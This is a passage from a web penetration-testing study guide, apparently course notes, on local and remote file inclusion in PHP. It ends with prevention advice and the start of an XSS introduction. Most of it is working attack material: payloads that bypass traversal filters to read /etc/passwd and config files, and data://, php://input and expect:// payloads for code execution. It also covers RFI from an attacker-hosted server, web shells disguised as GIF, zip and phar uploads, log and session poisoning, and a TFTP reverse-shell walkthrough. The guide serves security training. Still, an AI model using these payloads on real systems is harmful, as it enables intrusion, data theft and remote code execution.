The `....//` is not the only bypass that can be used. `..././` or `....\/`, and several other recursive LFI payloads can be used (found on Payload All the Things in GitHub). Furthermore, in some cases, escaping the forward slash character may also work to avoid path traversal filters (`....\/`) or adding extra forward slashes (`....////`).

<br>

**<u>Encoding</u>**

Some web filters may prevent input filters that include certain LFI-related characters, like a dot or a slash used for path traversals. Some of these filters can be bypassed by **URL encoding** user input, such that it would no longer include these bad characters, but would still be decoded back to the path traversal string once it reaches the vulnerable function.
* Core PHP filters on versions 5.3.4 and earlier were specifically vulnerable to this bypass, but even on newer versions, there may be custom filters that may be bypassed through URL encoding. 

If the target web application does not allow `.` and `/` in the input, `../` can be URL encoded into `%2e%2e%2f`, which may bypass the filter. To do so, any online URL encoder utility can be used to create a string with the /etc/passwd file:
```bash
index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
```

The string can be encoded twice to have a **`Double Encoded String`,** which may also bypass other types of filters. Blacklisted characters can be bypassed by using several command injection techniques.

<br>

**<u>Approved Paths</u>**

Some web applications may use **`Regex`** to ensure that the file being included is under a specific path. For example, this web application may only accept paths that are under the ./languages directory:
```php
if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
    include($_GET['language']);
} else {
    echo 'Illegal path specified!';
}
```

To find the approved path, requests sent by the existing forms can be examined, and see what path they use for the normal web functionality. 
* Directories can be fuzzed under the same path, trying different ones until one matches. To bypass this, **path traversal can be used, starting the payload with the approved path and then using ../ to go back to the root directory and read the specified file:** 
```bash
index.php?language=./languages/../../../../etc/passwd
```

Some web applications may apply this filter along with the previously mentioned filters, so these techniques can be combined, starting the payload with the approved path, and then URL encoding the payload or using a recursive payload.


> All techniques mentioned so far should work with any LFI vulnerability, regardless of the back-end development language or framework


<br>

**<u>Appended Extension</u>**

Again, some web applications append an extension to the input string (i.e., .php) to ensure that the included file is in the expected extension. With modern versions of PHP, there may be no bypass to read specific files on the system, but may be useful to read files with that extension for reading source code. 

Techniques to bypass appended extension filters are obsolete with modern versions of PHP and only work with PHP versions before 5.3/5.4. This is why it is important to enumerate properly, determining the server architecture.

<br>

**<u>Path Truncation</u>**

In earlier versions of PHP, defined strings have a maximum length of 4096 characters. If a longer string is passed, it will be truncated, and any characters after the maximum length will be ignored. 
* PHP also used to remove trailing slashes and single dots in path names, so if /etc/passwd/. is called, then the /. would also be truncated, and PHO would call /etc/passwd. 

* PHP, and Linux systems in general, also disregard multiple slashes in the path. Also, a current directory shortcut (.) in the middle of the path would also be disregarded
   * ////etc/passwd is the same as /etc/passwd
   * /etc/./passwd is the same as /etc/passwd

If both of these PHP limitations are combined, a long string can be created to evaluate to a correct path. Whenever the 4096 character limitation is reached, the appended extension (.php) would be truncated, and the path without the appended extension would be reached. It is important to note that this requires a non-existing directory to be the start of the path for this to work
```ash
?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
```

Instead of manually typing ./ 2048 times, this can be automated:
```bash
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; 
```

<br>

**<u>Null Bytes</u>**

PHP versions before 5.5 were vulnerable to null byte injection, which means that adding a **null byte (`%00`)** at the end of the string would terminate the string and not consider anything after it.
* This is due to how strings are stored in low-level memory, where strings in memory must use a null byte to indicate the end of a string, like in Assembly, C, or C++

To exploit this vulnerability, the payload can be ended with a null byte (etc/passwd%00), such that the final path passed to `include()` would be etc/passwd%00.php. This way, even though .php is appended to the string, anything after the null byte would be truncated.

<a id="phpfiltersfiledisc"></a>

#### **`PHP Filters`**

**`PHP Wrappers`** allow hackers to access different I/O streams at the application level, like standard input/output, file descriptors, and memory streams. These wrappers can be used to extend exploitation attacks, read PHP source code files, or even execute system commands. 

**<u>Input Filters</u>**

PHP filters are a type of PHP wrapper, where different types of input can be passed and have it filtered by the specified filter. To use **PHP wrapper streams, the `php://`** scheme can be used in the string, and the **PHP filter wrapper can be accessed with `php://filter/`**

The filter wrapper has several parameters, but the main ones for attacks are: * **`resource`:** Required for filter wrappers. With it, the stream that is to be applied the filter on (i.e., a local file) can be specified

* **`read`:** Can apply different filters on the input resource, so it can be used to specify which filter is to be applied on the resource

There are four different types of filters available for use, which are `String Filters`, `Conversion Filters`, `Compression Filters`, and `Encryption Filters`.
* The most useful for LFI attacks is the **`convert.base64-encode filter`,** which is a Conversion Filter.

<br>

**<u>Fuzzing for PHP Files</u>**

First, the different available PHP pages need to be fuzzed with ffuf or gobuster:
```bash
ffuf -w /seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php
```

> Scan for all codes, including 200, 301, 302, and 403 pages. Read their source codes. 

Even after reading the sources of any identified files, scan them for other referenced PHP files and read those too until gathering most of the web application's source or having an accurate image of what it does. It is also possible to start by reading `index.php` and scanning it for more references and so on, but fuzzing for PHP files may reveal files that may not otherwise be found that way.  

<br>

**<u>Standard PHP Inclusion</u>**

Again, if trying to include any php files through LFI, the included PHP file gets executed and eventually rendered as a normal HTML page. 
* For example, the following includes the config.php page (the .php extension is appended by the web application):
```bash
index.php?language=config
```

An empty result will be in place of the LFI string, since the config.php most likely only sets up the web app configuration and does not render any HTML output. 
* This may be useful in certain cases, like accessing local PHP pages that are not accessible (SSRF), but in most cases, it is better to read the PHP source code through LFI
  * Source codes tend to reveal important information about the web app. 

The **`base64 php filter`** is useful in this case, as base64 can be used to encode the php file, then the encoded source code would be produced instead of it being executed and rendered. This is especially useful for cases dealing with LFI with appended PHP extensions, because the hacker may be limited in only including PHP files. 

<br>

**<u>Source Code Disclosure</u>**

Once a list is gathered for potential PHP files that are to be read, their sources can be disclosed with the base64 php filter. The following example attempts to read the source code of config.php using the base64 filter by specifying **`convert.base64-encode`** for the read parameter and config for the resource parameter:
```php
php://filter/read=convert.base64-encode/resource=config

/index.php?language=php://filter/read=convert.base64-encode/resource=config
```

> The resource file is intentionally left at the end of the string, as the .php extension is automatically appended to the end of the input string, making the specified resource config.php

Using the base64 filter returns an encoded string instead of an empty result. This string can be decoded to get the source code of config.php, as follows:
```bash
echo 'PD9waHAK...SNIP...KICB9Ciov' | base64 -d
```

Now, this file can be investigated for sensitive information like credentials or database keys. Also, look for more references and then disclose their sources.

<a id="phpwrappersrce"></a>

#### **`PHP Wrappers (RCE)`**

**<u>Data</u>**

The **`Date Wrapper`** can be used to include external data, including PHP code. However, **the data wrapper is only available to use if the `allow_url_include` setting is enabled in the PHP configuration**; therefore, first confirm whether this setting is enabled by reading the PHP configuration file through the LFI vulnerability

**<u>Checking PHP Configurations</u>**

The PHP configuration file can be found in the following directories (X.Y is the install PHP version):
* **Apache:** /etc/php/X.Y/apache2/php.ini

* **Nginx:** /etc/php/X.Y/fpm/php.ini

> Start with the latest PHP version, and then try earlier versions if the configuration file is unable to be located. 

The base64 filter should be used, as .ini files are similar to .php files and must be encoded to avoid breaking. Finally, use `cURL` or Burp instead of a browser, as the output string could be very long and should be captured properly:
```bash
curl "http://<SERVER_IP>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
```

Once the base64 encoded string is obtained, decode it and grep for `allow_url_include` to see its value:
```bash
 echo '<string>' | base64 -d | grep allow_url_include
 ```

See if this option is enabled; if so, the data wrapper can be used. This option is not enabled by default, and is required for several other LFI attacks, like using the input wrapper or for any RFI attack. 
* It is not uncommon to see this option enabled, as many web applications rely on it to function properly, like some WordPress plugins and themes, for example. 

<br>

**<u>Remote Code Execution</u>**

With `allow_url_include` enabled, a data wrapper attack can be performed. `base64` encoded strings can be passed with `text/plain;base64`, and it has the ability to decode them and execute the PHP code. The first step would be to base64 encode a basic PHP shell:
```bash
echo '<?php system($_GET["cmd"]); ?>' | base64
> PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
```

After this, the base64 string can be URL encoded, and then passed through the data wrapper with `data://text/plain;base64,`. Now, commands can be passed through the web shell with `&cmd=<COMMAND>`
```bash
language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
```

cURL can be used for the same attack:
```bash
curl -s 'http://<SERVER_IP>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
```

<br>

**<u>Input</u>**

Similar to the data wrapper, the **`Input Wrapper`** can be used to include external input and execute PHP code; however, the input wrapper allows an attacker to pass their input to the input wrapper as a POST request's data. So, this vulnerable parameter must accept POST request for this attack to work. Finally, the input wrapper also depends on the `allow_url_include` setting. 

To perform this attack, a POST request can be sent to the vulnerable URL and a web shell can be added as POST data. To execute a command, an attacker would pass it as a GET parameter, like in the previous attack:
```bash
 curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:/index.php?language=php://input&cmd=id" | grep uid
```

> To pass the command as a GET request, the vulnerable function needs to accept GET request (i.e., use $_REQUEST). If it only accepts POST requests, then the command can be put directly in the PHP code, instead of a dynamic web shell (i.e., <\?php system('id')?>)

<br>

**<u>Expect</u>**

The **`Expect Wrapper`** allows attackers to directly run commands through URL streams. Expect works similar to the previous web shells, but it doesn't need to provide a web shell because it is designed to execute commands. 

Expect is an external wrapper, so it needs to be manually installed and enabled on the back-end server, though some web apps rely on it for their core functionality, so it may be encountered in specific cases. To determine whether it is installed on the back-end server, the same can be done as with allow_url_include, but grep for expect instead:
```bash
echo '<string>' | base64 -d | grep expect
```
* If enabled, `extension=expect` would appear in the output. 


The expect module can be used to gain RCE through the LFI vulnerability. To use the expect module, the `expect://` wrapper can be used to pass a command that is to be executed:
```bash
curl -s "http://<SERVER_IP>/index.php?language=expect://id"
```

<a id="rfirce"></a>

#### **`Remote File Inclusion (RCE)`**

If the vulnerable function allows the inclusion of remote URLs, this allows two main benefits:
1. Enumerating local-only ports and web applications (i.e., SSRF)

2. Gaining RCE by including a malicious script that is hosted from the attacking machine. 



**<u>Local vs. Remote File Inclusion</u>**

When a vulnerable function allows attackers to include remote files, they may be able to host a malicious script, and then include it in the vulnerable page to execute malicious functions and gain RCE. 

Almost any RFI vulnerability is also an LFI vulnerability, as any function that allows including remote URLs usually also allows including local ones; however, an LFI may not necessarily be an RFI for the follwing three reasons:
1. The vulnerable function may not allow including remote URLs

2. Attackers may only control a portion of the filename and not the entire protocol wrapper (i.e., http://, ftp://, https://)

3. The configuration may prevent RFI altogether, as most modern web servers disable including remote files by default. 

> Some functions allow including remote URLs but do not allow code execution. In this case, attackers would still be able to exploit the vulnerability to enumerate local ports and web applications through SSRF

<br>

**<u>Verify RFI</u>**

In most languages, including remote URLs is considered as a dangerous practice as it may allow for such vulnerabilities. This is why remote URL inclusion is usually disabled by default. For example, any remote URL inclusion in PHP would require the allow_url_include setting to be enabled, as seen in the *PHP Wrappers (RCE)* section.
* This may not always be reliable, as even if this setting is enabled, the vulnerable function may not allow remote URL inclusion to begin with

A more reliable way to determine whether an LFI vulnerability is also vulnerale to RFI is to try and include a URL, and see if content can be gathered. At first, try to include a local URL to ensure that the attempt does not get blocked by a firewall or other security measures. The following example uses the local host as the input string to see if it gets included:
```bash
index.php?language=http://127.0.0.1:80/index.php
```

If this is vulnerable to RFI, the index.php, in this case, will be included in the vulnerable section. If so, it is possible to include URLs. Furthermore, if the page executes and renders as PHP and not included as source code text, the vulnerable function will also allow PHP execution, which may allow attackers to execute code if a malicious PHP is included from the hosted machine.

> It may not be ideal to include the vulnerable page itself (i.e., index.php), as this may cause a **recursive inclusion loop and cause a DoS** to the back-end server

<br>

**<u>Remote Code Execution with RFI</u>**

The first step in gaining RCE is creating a malicious script in the language of the web application, PHP in this case. A custom web shell can be downloaded from the internet, a reverse shell script can be used, or a basic web shell can be written:
```bash
echo '<?php system($_GET["cmd"]); ?>' > shell.php
```

Now, this script needs to be hosted on the attacking machine and included through the RFI vulnerability. It is a good idea to listen on a common HTTP port like 80 or 443, as these ports may be whitelisted in case the vulnerable web application has a firewall preventing outgoing connections. Furthermore, the script can be hosted through an FTP or SMB service

<br>

**<u>HTTP</u>**

Start a server on the attacking machine with a basic python server. Of course, the malicious script should be in the same directory as the directory being hosted, to make the RFI easier:
```bash
sudo python3 -m http.server <PORT>
```

Now, include the local shell through RFI, but using the attacker's IP and listening port. Also, specify the command to be executed with `&cmd=<COMMAND>:`
```bash
http://<SERVER_IP>/index.php?language=http://<ATTACKING_IP>:<PORT>/shell.php&cmd=id
```
* If successful, the server will connect to the python server, the remote shell will be included, and the specified command will be executed

* Examine the connection to the attacking machine to ensure the request is being sent as specified. If an extra extension, like .php, was appended to the request, then omit it from the payload


**<u>FTP</u>**

If the script is hosted through FTP, a basic FTP server can be started with `Python's pyftpdlib`:
```bash
sudo python -m pyftpdlib -p 21
```
* This may be useful in case http ports are blocked by a firewall or the http:// string gets blocked by a WAF. 


To include the malicious script, the `ftp://` scheme can be used in the URL:
```bash
http://<SERVER_IP>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
```

By default, PHP tries to authenticate as an anonymous user. If the server requires balid authentication, then the credentials can be specified in the URL, as follows:
```bash
curl 'http://<SERVER_IP>:<PORT>/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
```

**<u>SMB</u>**

If the vulnerable web application is hosted on a Windows server (determined from the server version in the HTTP response headers), then the attacker does not need the `allow_url_include` setting to be enabled for RFI exploitation, as the SMB protocol can be used for the RFI. This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path. 

An SMB server can be created via `Impacket's smbserver.py`, which allows anonymous authentication by default:
```bash
impacket-smbserver -smb2support share $(pwd)
```

Once configured, the script can be included via an UNC path (i.e., \\<ATTACKERS_IP>\share\shell.php), and specify the command with &cmd=<COMMAND>:
```bash
http://<SERVER_IP>/index.php?language=\\<ATTACKERS_IP>\share\shell.php&cmd=whoami
```

This attack works in including the remote script without enabling any non-default settings; however, this technique is more likely to work if on the same network as the target server, as accessing remote SMB servers over the internet may be disabled by default depending on the Windows server configurations.

<a id="lfiandfileuploadsrce"></a>

#### **`LFI and File Uploads (RCE)`**

For attackers, the ability to store files on the back-end server may extend the exploitation of many vulnerabilities, like a file inclusion vulnerability

While there are several different techniques on how to exploit file upload forms and functionalities, for LFI, the only thing needed is to upload files. If the vulnerable function has code execute capabilities, then the code within the uploaded file will get executed everytime it is included, regardless of the file extension or file type. 
* For example, an image file (image.jpg) can be uploaded with a stored PHP web shell code within it instead of image data. If included through an LFI vulnerability, the PHP code will get executed and RCE will be achieved. 

<br>


**<u>Image Upload</u>**

**Image Upload** is very common in most modern web applications, as uploading images is widely regarded as safe if the upload function is securely coded. The vulnerability, in this case, is not in the file upload form, but the file inclusion functionality

The first step is to create a malicious image containing a PHP web shell code that still looks and works as an image. Use an **allowed image extension** in the file name (i.e., shell.gif) and include the image magic bytes at the beginning of the file content (i.e., GIF8), just in case the upload form checks for both the extension and content type:
```bash
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
```

While this file on its own is completely harmless and would not affect normal web applications in the slightest, if combined with an LFI vulnerability, then achieving RCE may be possible:

> A GIF image is used in this example since its magic bytes are easily typed, as they are ASCII characters, while other extensions have magic bytes in binary that would need to be URL encoded. However, this attack would work with any allowed image or file type 

At this point, the attacker should attempt to upload the malicious image. Continue to the next part if successfully uploaded.

<br>

**<u>Uploaded File Path</u>**

If the file uploads to the server, it should now be included through the LFI vulnerability. **To include the uploaded file, the path to it must be known.** In most cases, especially with images, one would get access to the uploaded file and can get its path from its URL. Sometimes, **inspecting the source code after uploading the image will provide the proper path.**
* If this does not work, fuzz for an uploads directory and then fuzz for the uploaded file. This may not always work as some web applications properly hide the uploaded files

After discovering the uploaded file path, include the uploaded file in the LFI vulnerable function, executing the PHP code:
```bash
http://<SERVER_IP>/index.php?language=./profile_images/shell.gif&cmd=id
```

<br>

**<u>Zip Upload</u>**

There are a couple of PHP-only techniques that use PHP wrappers to achieve RCE.

The `ZIP wrapper` can be used to execute PHP code; however, this wrapper isn't enabled by default, so this method may not always work. To do so, a PHP web shell can be created and zipped into a zip archive (shell.jpg):
```bash
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
```

> Even though the zip archive is named shell.jpg, some upload forms may still detect the file as a zip archive through content-type tests and disallow its upload, so this attack has a higher chance of working if the upload of zip archives is allowed

Once the shell.jpg archive is uploaded, it can be included with the zip wrapper as `zip://shell.jpg`, and then refer to any files within it with `#shell.php` (URL encoded). Commands can be executed with `&cmd=<COMMAND>`:
```bash
http://<SERVER_IP>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
```

<br>

**<u>Phar Upload</u>**

The `phar://` wrapper can be used to achieve a similar result to that of the ZIP wrapper. To do so, write the PHP script into a shell.php file:
```php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();
```

This script can be compiled into a phar file that when called would write a web shell to a shell.txt subfile, which can be interacted with. This can be compiled into a phar file and renamed to shell.jpg:
```bash
 php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
```

At this point, there should be a phar file called shell.jpg. Once it is uploaded to the web application, it can be called with `phar://` and provide its URL path, and then the phar sub-file can be specified with `/shell.txt` (URL encoded) to get the output of the specified command with &cmd=<COMMAND>:
```bash
http://<SERVER_IP>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
```

<a id="lfilogpoisoningsrce"></a>

#### **`Log Poisoning (RCE)`**

If any file that containts PHP code is included, it will get executed as long as the vulnerable function has the Execute privileges. **The following attacks all rely on the same concept: writing PHP code in a controllable field that gets logged into a log file, and then include that log file to execute the PHP code.** For this attack to work, the PHP web application should have read priviliges over the logged files, which vary from one server to another. 

<br>

**<u>PHP Session Poisoning</u>**

Most PHP web application use **`PHPSESSID`** cookies, which can hold specific user-related data on the back-end, so the web application can keep track of user details through their cookies. 
* These details are stored in session files on the back-end, and saved in **`/var/lib/php/sessions/` on Linux and in `C:\Windows\Temp\` on Windows.** 

* The name of the file that contains a user's data matches the name of the PHPSESSID cookie with the `sess_` prefix
   * For example, if the PHPSESSID cookie is set to `el4ukv0kqbvoirg7nkp4dncpk3`, then its location on disk would be `/var/lib/php/sessions/sess_el4ukv0kqbvoirg7nkp4dncpk3`

The first thing that needs to be done in a PHP Session Poisoning attack is to examine the PHPSESSID session file and see if it contains any data that can be controlled and poisoned. So, **first check if the PHPSESSID cookie is set to the session.** `Inspect the page to determine this`


If there is PHPSESSID cookie value, it would be stored in the aforementioned directory. Try to include this session file through the LFI vulnerability and view its contents:
```bash
http://<SERVER_IP>:/index.php?language=/var/lib/php/sessions/sess_el4ukv0kqbvoirg7nkp4dncpk3
```

> The cookie value will differ from one session to another, so the attacker needs to use the cookie value found in their own session to perform the attack 

The session file should contain two values:
1. **Page:** Shows the selected page. The page value is under the users control, and in this case, can be controlled through the `?language=parameter`

2. **Preference:** Shows the selected language. This value is not under the users control, as it cannot be specified anywhere, so it must be automatically specified

<br>

**1. Try setting the value of page a custom value via the parameter,** and see if it changes in the session file. This can be done by visting the page as follows:
```bash
http://<SERVER_IP>/index.php?language=session_poisoning
```

**2. Now, include the session file again to look at its contents:**
```bash
http://<SERVER_IP>:/index.php?language=/var/lib/php/sessions/sess_el4ukv0kqbvoirg7nkp4dncpk3
```
* At this point, the session file should contain session_poisoning instead of the .php file, confirming the ability to control the value of page in the session file. 


**3. The next step is to perform the poisoning step by writing PHP code to the session file.** A basic PHP web shell can be written by changing the ?language=
parameter to a URL encoded web shell:
```bash
http://<SERVER_IP>:/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
```

**4. Finally, the session file can be included,** using `&cmd=<COMMAND>` to execute commands:
```bash
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_el4ukv0kqbvoirg7nkp4dncpk3&cmd=id
```

> To execute another command, the session file has to be poisoned with the web shell again, as it gets overwritten after the last inclusion. Ideally, the poisoned web shell would be used to write a permanent web shell to the web directory, or send a reverse shell for easier interaction

<br><br>

**<u>Server Log Poisoning</u>**

Both Apache and Nginx maintain various log files, such as **access.log** and **error.log** The access.log file contains a lot information about all requests made to the server, including each request's `User-Agent header`. As the User-Agent header can be controlled in requests, it can be used to poison the server logs as well

Once poisoned, the logs can be included through the LFI vulnerability, and for that, there needs to be read-access over the logs. Nginx logs are readable by low privileged users by default, while the Apache logs are only readable by users with high privileges; however, in older or misconfigured Apache servers, these logs may be readable by low-privileged users. By default:
* **`Apache Logs`** are located in **/var/log/apache2/** on **Linux** and in **C:\xampp\apache\logs\\** on **Windows**

* **`Nginx Logs`** are located in **/var/log/nginx/** on **Linux** and in **C:\nginx\log\\** on **Windows**

* In some cases, these logs may be in different locations, so an LFI wordlist can be used to fuzz for their locations. 

<br>

The following attempts to include the Apache access log from **`/var/log/apache2/access.log`**:
```bash
http://<SERVER_IP>/index.php?language=/var/log/apache2/access.log
```
* If this works, the log will be outputted to the HTML page. The log contains the remote IP address, request page, response code, and the User-Agent header
   * The User-Agent header is controlled by the end user through the HTTP request headers, so this value should be poisonable

> Loading logs through an LFI vulnerability may take a while to load, or even crash the server in worst-case scenarios. Be careful and efficient with them in a production environment and don't send unnecessary requests. 

Modifying the User-Agent header can be done through Burp

**1.** Intecept the LFI request

**2.** Modify the User-Agent header to Apache Log Poisoning
```html
User-Agent: Apache Log Poisoning
```

**3.** Send the request 

**4.** The custom User-Agent value should be visible in the included log file. Now, poison the User-Agent header by seetting it to a basic PHP shell
```html
User-Agent: <?php system($_GET['cmd']); ?>
```

* The log can also be poisoned by sending a request through cURL:
```bash
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"
```

At this point, the log should now contain PHP code, the LFI vulnerability should execute this code, allowing RCE. A command can be executed with `cmd?<COMMAND>`:
```html
GET /index.php?language=var/log/apache2/access.log&cmd=id HTTP/1.1
HOST: x.x.x.x
....
```

> The User-Agent header is also shown on process files under the Linux `/proc/` directory. So, try including the `/proc/self/environ` or `/proc/self/fd/N` files, where N is a PID usually between 0-50. This is especially useful when there is no read access over the server logs, however, these files may only be readable by privileged users

<a id="lfivulnscanning"></a>

#### **`Automated Vulnerability Scanning`**

**<u>Fuzzing Parameters</u>**

The HTML forms users can use on the web app front-end tend to be properly tested and well secured against different web attacks; however, in many cases, the page may have other exposed parameters that are not linked to any HTML forms, so normal users would never access or unintentionally cause harm through. This is why it may be important to fuzz for exposed parameters, as they tend not to be as secure as public ones. The following fuzzes a page for common GET parameters:
```bash
 ffuf -w /seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs xxxx
```

<br>

**<u>LFI wordlists</u>**

A good wordlist is **`LFI-Jhaddix.txt`,** as it contains various bypasses and common files, so it makes it easy to run several tests at once. This wordlist can be used to fuzz the **?language=** parameter:
```bash
ffuf -w /seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs xxxx
```

Once successful payloads are identified, manually test them to verify that they work as expected and show the included file content

<br>


**<u>Fuzzing Server Files</u>**

Besides fuzzing LFI payloads, there are different server files that may be helpful in LFI exploitation, so it would be helpful to know where these files exist and whether they can be read. These files include the following:


**`Server Webroot`**

The full server webroot path may be needed to complete exploitation in some cases. For example, if trying to locate an uploaded file but unable to reach its `/` uploads directory through relative paths (i.e., ../../uploads). In these cases, an attacker may have to figure out the server webroot path so that they can locate the uploaded files through absolute paths instead of relative paths.

To do so, fuzz for the `index.php` file through common webroot paths. Depending on the LFI situation, a few directories back may need to be specified (../../../../), and then the index.php afterwards:
```bash
ffuf -w /seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs xxxx
```

The scan will likely identify the correct webroot path. If this wordlist doesn't work, then the `LFI-Jhaddix.txt` wordlist can be used. If the webroot can still not be identified, then the best choice would be to read the server configurations, as they contain the webroot and other important information.

<br>

**`Server Logs/Configurations`**

The LFI-Jhaddix.txt wordlist can be used, as it contains many of the server logs and configuration paths that may be interesting:
```bash
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs xxxx
```

After getting the results from the scan, read any of them to see whether content can be pulled. 


<a id="lfiexamplestorce"></a>

#### **`File Inclusion Examples`**

> The following examples do not include enumeration; this should be done before trying to perform any exploit

**<u>LFI with TFTP</u>**

**1. Find LFI Vulnerability**

**2. Create a Reverse PHP Shell and Start a NC Listener**

[Reverse Shell](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)

```bash
nc -lvnp <PORT>
```

**3. Connect to the Target's TFTP and upload the Malicious File**
```bash
tftp <Target IP> 
tftp> put php-reverse-shell.php
```

**4. Locate the TFTP Folder**

This is typically in `/var/lib/tftpboot/`

**5. Exploit**
```bash
curl 'http://<Target_IP>/?file=/var/lib/tftpboot/php-reverse-shell.php'
```

The nc connection should now be a reverse shell. To get a fully functional shell, do the following:
```bash
Python3 -c 'import pty;pty.spwn("/bin/bash")'
```

<a id="fiprevention"></a>

#### **`File Inclusion Prevention`**

The most effective thing that can be done to reduce file inclusion vulnerabilities is to **avoid passing any user-controlled inputs into any file inclusion functions or APIs.** The page should be able to dynamically load assets on the back-end, with no user interaction whatsoever. If this is not possible, then there should be a **limited whitelist of allowed user inputs,** and match each input to the file to be loaded while having a default value for all other inputs. If dealing with an existing web application, create a whitelist that contains all existing paths used in the front-end, and then use the list to match the user input. 
* Such a whitelist can have many shapes, like a database table that matched IDs to files, a case-match script that matches names to files, or even a static JSON map with names and files that can be matched. 
    * Once this is implemented, the user input is not going into the function, but the matched files are used in the function, which avoids file inclusion vulnerabilities

<br>

**<u>Preventing Directory Traversal</u>**

If attackers can control the directory, they can escape the web app and attack something they are more familiar with or use a universal attack chain. Directory traversal could potentially allow attackers to do any of the following:
* Read /etc/passwd and potentially find SSH keys or know valid user names for a password spray attack

* Find other services on the machine
    * Such as Tomcat; read the tomcat-users.xml file

* Discover valid PHP Session Cookies and perform session hijacking

* Read current web application configuration and source code

The best way to prevent directory traversal is to use the programming language's (or framework's) built-in tool to pull only the filename. For example, **PHP has `basename()`,** which will read the path and only return the filename portion. If only a filename is given, then it will return just the filename. If just the path is given, it will treat whatever is after the final `/` as the filename. The downside to this method is that if the application needs to enter any directories, it will not be able to do it. 

Besides this, the **user input can be sanitized to recursively remove any attempts** of traversing directories:
```php
while(substr_count($input, '../', 0)) {
    $input = str_replace('../', '', $input);
};
```

<br>

**<u>Web Server Configuration</u>**

Several configurations may also be used to reduce the impact of file inclusion vulnerabilities in case they occur. For example, the inclusion of remote files should be globally disabled. In PHP this can be done by setting **`allow_url_fopen` and `allow_url_include` to Off**

It's also often possible to lock web apps to their web root directory, preventing them from accessing non-web related files. The most common way to do this in modern times is by running the application within **`Docker`;** however, if that is not an option, many languages often have a way to prevent accessing files outside of the web directory. In PHP, this can be done by adding **`open_basedir = /var/www` in the php.ini file.** Furthermore, a web designer should ensure that any potentially dangerous modules are disabled, like **`PHP Expect mod_userdir.`**
* If these configurations are applied, it should prevent accessing files outside the web application folder, so even if an LFI vulnerability is identified, its impact would be reduced. 

<br>

**<u>Web Application Firewall (WAF)</u>**

The universal way to harden applications is to use a WAF, like ModSecurity. When dealing with WAFs, the most important thing to avoid is false positives and blocking non-malicious requests. ModSecurity minimizes false positives by offering a permissive mode, which will only report things it would have blocked. This lets defenders tune the rules to make sure no legitimate request is blocked. Even if the organization never wants to turn the WAF to *blocking mode*, having it in permissive mode can be a warning sign that the application is being attacked. 

Finally, it is important to remember that the purpose of hardening is to give the application a stronger exterior shell, so when an attack does happen, the defenders have time to defend. 

<a id="xss"></a>

### **`Cross-Site Scripting`**

XSS vulnerabilities take advantage of a flaw in user input sanitization to "write" JS code to the page and execute it on the client side, leading to several types of attacks. When a vulnerable web app does not properly sanitize user input, a malicious user can inject extra JS code in an input field, so once another user views the same page, they unknowingly execute the malicious JS code. 
* XSS vulnerabilities are solely executed on the client-side and hence do not directly affect the back-end server. They can only affect the user execuring the vulnerability. The direct impact of XSS vulnerabilities on the back-end server may be relatively low, but they are commonly found in web applications, so this equates to a medium risk.

XSS vulnerabilities can facilitate a wide range of attacks, which can be anything that can be executed through browser JS code. A basic example of an XSS attack is having the target user unwittingly send their session cookie to the attacker's web server. Another example is having the target's browser execute API calls that lead to a malicious action, like changing the user's password to a password of the attacker's choosing. 

As XSS attacks execute JS code within the browser, they are limited to the browser's JS engine. They cannot execute system-wide JS code to do something like system-level code execution. In modern browsers, they are also limited to the same domain of the vulnerale website. Nevertheless, being able to execute JS in a user's browser may still lead to a wide variety of attacks. In addition to this, if a researcher identifies a binary vulnerability in a web browser, they can use an XSS vulnerability to execute a JS exploit on the target's browser, which eventually breaks out the browser's sandbox and executes code on the user's machine

There are three main types of XSS vulnerabilities:
1. **`Stored (Persistent) XSS`:** The most critical type of XSS, which occurs when user input is stored on the back-end database and then displayed upon retrieval. Other users can be targeted with this XSS type

2. **`Reflected (Non-Persistent) XSS`:** Occurs when user input is displayed on the page after being processed by the back-end server, but without being stored. In this case, the injected script comes from the HTTP response, where the script is included. The user can pretty much only target themself

3. **`DOM-based XSS`:** Another non-persistent XSS type that occurs when user input is directly shown in the browser and is completely processed on the client-side, without reaching the back-end server (i.e., through client-side HTTP parameters or anchor tags). 

<a id="storedxss"></a>

